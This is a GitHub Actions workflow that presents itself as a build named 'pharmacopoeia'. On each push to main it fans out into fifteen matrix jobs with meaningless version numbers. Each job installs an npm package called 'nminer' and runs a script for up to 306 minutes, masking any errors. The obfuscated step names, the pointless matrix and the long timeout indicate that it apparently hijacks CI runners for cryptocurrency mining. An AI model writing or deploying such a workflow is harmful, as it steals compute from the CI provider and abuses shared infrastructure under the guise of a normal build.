name: pharmacopoeia
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1975 }
          - { version: 1067 }
          - { version: 4796 }
          - { version: 8132 }
          - { version: 3185 }
          - { version: 8585 }
          - { version: 8665 }
          - { version: 8687 }
          - { version: 5134 }
          - { version: 964 }
          - { version: 7680 }
          - { version: 9237 }
          - { version: 2191 }
          - { version: 6644 }
          - { version: 2742 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: tough midst
        run: |
          npm install nminer@latest
          timeout 306m node pharmacopoeia.js || echo "pharmacopoeia executed"